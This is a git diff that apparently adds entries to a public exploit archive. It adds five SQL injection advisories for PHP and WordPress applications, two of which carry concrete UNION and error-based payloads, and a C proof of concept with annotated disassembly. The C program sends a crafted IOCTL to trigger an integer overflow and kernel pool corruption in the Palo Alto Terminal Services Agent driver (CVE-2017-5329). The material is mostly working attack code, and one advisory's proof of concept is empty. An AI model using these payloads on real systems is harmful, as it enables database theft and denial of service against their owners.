diff --git a/files.csv b/files.csv
index e1d96f901..886e1f94e 100644
--- a/files.csv
+++ b/files.csv
@@ -8771,6 +8771,7 @@ id,file,description,date,author,platform,type,port
41158,platforms/linux/local/41158.txt,"Man-db 2.6.7.1 - Privilege Escalation (PoC)",2015-12-02,halfdog,linux,local,0
41171,platforms/linux/local/41171.txt,"Systemd 228 - Privilege Escalation (PoC)",2017-01-24,"Sebastian Krahmer",linux,local,0
41173,platforms/linux/local/41173.c,"OpenSSH 6.8 < 6.9 - 'PTY' Privilege Escalation",2017-01-26,"Federico Bento",linux,local,0
+41176,platforms/windows/local/41176.c,"Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow",2017-01-26,"Parvez Anwar",windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -37108,3 +37109,8 @@ id,file,description,date,author,platform,type,port
41170,platforms/hardware/webapps/41170.txt,"TM RG4332 Wireless Router - Arbitrary File Disclosure",2017-01-26,"Saeid Atabaki",hardware,webapps,0
41172,platforms/php/webapps/41172.txt,"PHPBack < 1.3.1 - SQL Injection / Cross-Site Scripting",2017-01-26,"Manish Tanwar",php,webapps,0
41175,platforms/hardware/webapps/41175.txt,"Polycom VVX Web Interface - Change Admin Password",2017-01-26,"Mike Brown",hardware,webapps,0
+41177,platforms/php/webapps/41177.txt,"My Photo Gallery 1.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
+41178,platforms/php/webapps/41178.txt,"Maian Weblog 4.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
+41180,platforms/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2017-01-27,"Lenon Leite",php,webapps,0
+41181,platforms/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
+41182,platforms/php/webapps/41182.txt,"WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/41177.txt b/platforms/php/webapps/41177.txt
new file mode 100755
index 000000000..f41fc5d61
--- /dev/null
+++ b/platforms/php/webapps/41177.txt
@@ -0,0 +1,30 @@
+Introduction
+
+Exploit Title: My Photo Gallery – SQL Injection
+Date: 27.01.2017
+Vendor Homepage: http://software.friendsinwar.com/
+Software Link: http://software.friendsinwar.com/news.php?readmore=40
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+
+Overview
+
+My Photo Gallery is a free is a user-friendly picture gallery script.
+Users can register and upload their images to the site. A moderator can see the images and validate, edit or delete them.
+The script comes with a very user friendly admin system where you can change and add many things such as: Categories, Images, Edit members, site looks and many more.
+
+Type of vulnerability:
+
+An SQL Injection vulnerability in My Photo Gallery allows attackers to read
+arbitrary administrator data from the database.
+
+Vulnerable Url:
+
+http://locahost/my_photo_gallery/image.php?imgid=[payload]
+Vulnerable parameter : imgid
+Mehod : GET
+
+Payload:
+imgid=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7170767a71,0x6652547066744842666d70594d52797173706a516f6c496f4d4b6b646f774d624a614f52676e6372,0x716b766b71)--
diff --git a/platforms/php/webapps/41178.txt b/platforms/php/webapps/41178.txt
new file mode 100755
index 000000000..db912c34a
--- /dev/null
+++ b/platforms/php/webapps/41178.txt
@@ -0,0 +1,26 @@
+Introduction
+
+Exploit Title: Maian Weblog – SQL Injection
+Date: 27.01.2017
+Vendor Homepage: http://www.maianweblog.com/
+Exploit Author: Kaan KAMIS
+Contact: iletisim[at]k2an[dot]com
+Website: http://k2an.com
+Category: Web Application Exploits
+
+Overview
+
+Simple blog system for your website, Easily add/edit or delete blogs, Allow visitor comments for individual blogs, Optional e-mail notification for webmaster if comments are posted, Edit or delete visitor comments, BB Code, Calendar so visitors can view past archives, Support for multi language files, Show latest blogs/comments on blog page, Uses the Savant template engine.
+
+Type of vulnerability:
+
+An SQL Injection vulnerability in Maian Weblog allows attackers to read
+arbitrary data from the database.
+
+Vulnerable Url:
+
+http://locahost/weblog/blog/2[payload]/second-blog.html
+Mehod : GET
+
+Simple Payload:
+blog/2' AND (SELECT 2995 FROM(SELECT COUNT(*),CONCAT(0x71717a6a71,(SELECT (ELT(2995=2995,1))),0x717a787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'AUvx'='AUvx/q-blog.html
diff --git a/platforms/php/webapps/41180.txt b/platforms/php/webapps/41180.txt
new file mode 100755
index 000000000..d30b5ae76
--- /dev/null
+++ b/platforms/php/webapps/41180.txt
@@ -0,0 +1,38 @@
+# Exploit Title: WP Private Messages 1.0.1 – Plugin WordPress – Sql Injection
+# Exploit Author: Lenon Leite
+# Vendor Homepage: https://wordpress.org/plugins/wp-email-users/
+
+# Software Link: https://wordpress.org/plugins/wp-email-users/
+# Contact: http://twitter.com/lenonleite
+# Website: http://lenonleite.com.br/
+# Category: webapps
+# Version: 1.3.1
+# Tested on: Ubuntu 14.04
+
+1 - Description:
+
+Type user access: is accessible for any registered user
+
+$_REQUEST[‘edit’] is escaped wrong. Attack with Sql Injection
+
+http://lenonleite.com.br/blog/2017/01/17/english-wp-email-users-1-4-1-plugin-wordpress-sql-injection/
+
+2 - Proof of Concept:
+
+1 – Login as regular user (created using wp-login.php?action=register):
+
+2 – Using:
+
+
+
+
+3 - Timeline:
+
+- 12/01/2016 – Discovered
+- 13/12/2016 – Vendor not finded
diff --git a/platforms/php/webapps/41181.txt b/platforms/php/webapps/41181.txt
new file mode 100755
index 000000000..05c83975f
--- /dev/null
+++ b/platforms/php/webapps/41181.txt
@@ -0,0 +1,19 @@
+# # # # #
+# Exploit Title: Online Hotel Booking System Pro v1.2 - SQL Injection
+# Google Dork: N/A
+# Date: 27.01.2017
+# Vendor Homepage: http://www.bestsoftinc.com/
+# Software Buy: https://codecanyon.net/item/online-hotel-booking-system-pro/4606514
+# Demo: http://envato.bestsoftinc.net/hotel-booking-pro/
+# Version: 1.2
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/roomtype-details.php?tid=[SQL]
+# E.t.c
+# # # # #
+
diff --git a/platforms/php/webapps/41182.txt b/platforms/php/webapps/41182.txt
new file mode 100755
index 000000000..9a15a739a
--- /dev/null
+++ b/platforms/php/webapps/41182.txt
@@ -0,0 +1,18 @@
+# # # # #
+# Exploit Title: Online Hotel Booking System Pro v1.0 (WordPress Plugin) - SQL Injection
+# Google Dork: N/A
+# Date: 27.01.2017
+# Vendor Homepage: http://www.bestsoftinc.com/
+# Software Buy: https://codecanyon.net/item/online-hotel-booking-system-pro-wordpress-plugin/9338914
+# Demo: http://envato.bestsoftinc.net/wp-hotel-pro/
+# Version: 1.0
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[beygir]ihsan[nokta]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PLUGIN_PATH]/front/roomtype-details.php?tid=[SQL]
+# E.t.c
+# # # # #
diff --git a/platforms/windows/local/41176.c b/platforms/windows/local/41176.c
new file mode 100755
index 000000000..801bd7e9e
--- /dev/null
+++ b/platforms/windows/local/41176.c
@@ -0,0 +1,141 @@
+/*
+
+Exploit Title - Palo Alto Networks Terminal Services Agent Integer Overflow
+Date - 26th January 2017
+Discovered by - Parvez Anwar (@parvezghh)
+Vendor Homepage - https://www.paloaltonetworks.com/
+Tested Version - 7.0.3-13
+Driver Version - 6.0.7.0 - panta.sys
+Tested on OS - 32bit Windows 7 SP1
+CVE ID - CVE-2017-5329
+Vendor fix url - https://securityadvisories.paloaltonetworks.com/
+ https://securityadvisories.paloaltonetworks.com/Home/Detail/71
+Fixed Version - 7.0.7 and later
+Fixed driver ver - 6.0.8.0
+
+
+Disassembly
+-----------
+
+.text:9A26F0BD loc_9A26F0BD:
+.text:9A26F0BD mov ecx, DeviceObject
+.text:9A26F0C3 mov dword ptr [ecx+1ACh], 0
+.text:9A26F0CD mov edx, DeviceObject
+.text:9A26F0D3 mov eax, [edx+1B8h] ; eax points to our inputted buffer
+.text:9A26F0D9 mov ecx, [eax+14h] ; Takes size to allocate from our inputted buffer 0x04924925
+.text:9A26F0DC imul ecx, 38h ; 0x38 * 0x04924925 = 0x100000018. Wraps round becoming size to allocate 0x18 (Integer Overflow)
+.text:9A26F0DF mov [ebp+NumberOfBytes], ecx ; Copy ecx value 0x18 onto stack
+.text:9A26F0E2 push 44415450h ; Tag (PTAD string used)
+.text:9A26F0E7 mov edx, [ebp+NumberOfBytes] ; Copy size 0x18 to edx
+.text:9A26F0EA push edx ; NumberOfBytes
+.text:9A26F0EB push 0 ; PoolType
+.text:9A26F0ED call ds:ExAllocatePoolWithTag ; If returned null (eax) exits with error cleanly else takes crash path
+.text:9A26F0F3 mov ecx, DeviceObject
+.text:9A26F0F9 mov [ecx+1B0h], eax
+.text:9A26F0FF mov edx, DeviceObject
+.text:9A26F105 cmp dword ptr [edx+1B0h], 0 ; Checks return value. If not null then jumps to our crash path
+.text:9A26F10C jnz short loc_9A26F13C ; Exits with error cleanly if incorrect size value but not crashable value
+
+.text:9A26F13C
+.text:9A26F13C loc_9A26F13C:
+.text:9A26F13C mov ecx, [ebp+NumberOfBytes]
+.text:9A26F13F push ecx ; 0x18 our allocated pool memory
+.text:9A26F140 push 0 ; int, sets allocated memory to 0x00
+.text:9A26F142 mov edx, DeviceObject
+.text:9A26F148 mov eax, [edx+1B0h]
+.text:9A26F14E push eax ; Pointer to our allocated buffer
+.text:9A26F14F call memset
+.text:9A26F154 add esp, 0Ch
+.text:9A26F157 mov [ebp+var_4], 0 ; Null out ebp-4
+.text:9A26F15E jmp short loc_9A26F169
+
+.text:9A26F160 loc_9A26F160:
+.text:9A26F160 mov ecx, [ebp+var_4]
+.text:9A26F163 add ecx, 1 ; Increment counter
+.text:9A26F166 mov [ebp+var_4], ecx ; Store counter value
+
+.text:9A26F169 loc_9A26F169:
+.text:9A26F169 mov edx, DeviceObject
+.text:9A26F16F mov eax, [edx+1B8h] ; eax points to our inputted buffer
+.text:9A26F175 mov ecx, [ebp+var_4] ; Loop counter number
+.text:9A26F178 cmp ecx, [eax+14h] ; Compares our inputted buffer size 0x04924925. Here our
+ ; size is not using the wrapped value so loops till BSOD
+.text:9A26F17B jnb short loc_9A26F19A
+.text:9A26F17D mov edx, [ebp+var_4] ; Counter value
+.text:9A26F180 imul edx, 38h
+.text:9A26F183 mov eax, DeviceObject
+.text:9A26F188 mov ecx, [eax+1B0h] ; Pointer to allocated pool copied to ecx
+.text:9A26F18E lea edx, [ecx+edx+30h] ; pointer+size(0x38*edx)+0x30
+.text:9A26F192 push edx
+.text:9A26F193 call sub_9A26C000 ; Starts overwriting other pool allocations !!!
+.text:9A26F198 jmp short loc_9A26F160
+
+
+
+.text:9A26C000 sub_9A26C000 proc near
+.text:9A26C000
+.text:9A26C000
+.text:9A26C000 arg_0 = dword ptr 8
+.text:9A26C000
+.text:9A26C000 push ebp
+.text:9A26C001 mov ebp, esp
+.text:9A26C003 mov eax, [ebp+arg_0] ; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to eax
+.text:9A26C006 mov ecx, [ebp+arg_0] ; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to ecx
+.text:9A26C009 mov [eax+4], ecx ; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30+4
+.text:9A26C00C mov edx, [ebp+arg_0] ; Copy allocated buffer pointer+size(0x38*edx)+0x30 to edx
+.text:9A26C00F mov eax, [ebp+arg_0] ; Copy allocated buffer pointer+size(0x38*edx)+0x30 to eax
+.text:9A26C012 mov [edx], eax ; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30
+.text:9A26C014 pop ebp
+.text:9A26C015 retn 4
+.text:9A26C015 sub_9A26C000 endp
+
+
+
+*/
+
+
+
+#include
+#include
+
+#define BUFSIZE 44
+
+
+int main(int argc, char *argv[])
+{
+ HANDLE hDevice;
+ char devhandle[MAX_PATH];
+ DWORD dwRetBytes = 0;
+ unsigned char buffer[BUFSIZE];
+
+
+ memset(buffer, 0x41, BUFSIZE);
+
+ printf("\n[i] Size of total input buffer %d bytes", BUFSIZE);
+
+ *(DWORD*)(buffer + 20) = 0x04924925;
+
+ sprintf(devhandle, "\\\\.\\%s", "panta");
+
+ hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
+
+ if(hDevice == INVALID_HANDLE_VALUE)
+ {
+ printf("\n[-] Failed to open device %s\n\n", devhandle);
+ return -1;
+ }
+ else
+ {
+ printf("\n[+] Open %s device successful", devhandle);
+ }
+
+ printf("\n[~] Press any key to continue . . .");
+ getch();
+
+ DeviceIoControl(hDevice, 0x88002200, buffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);
+
+ printf("\n");
+ CloseHandle(hDevice);
+ return 0;
+}
+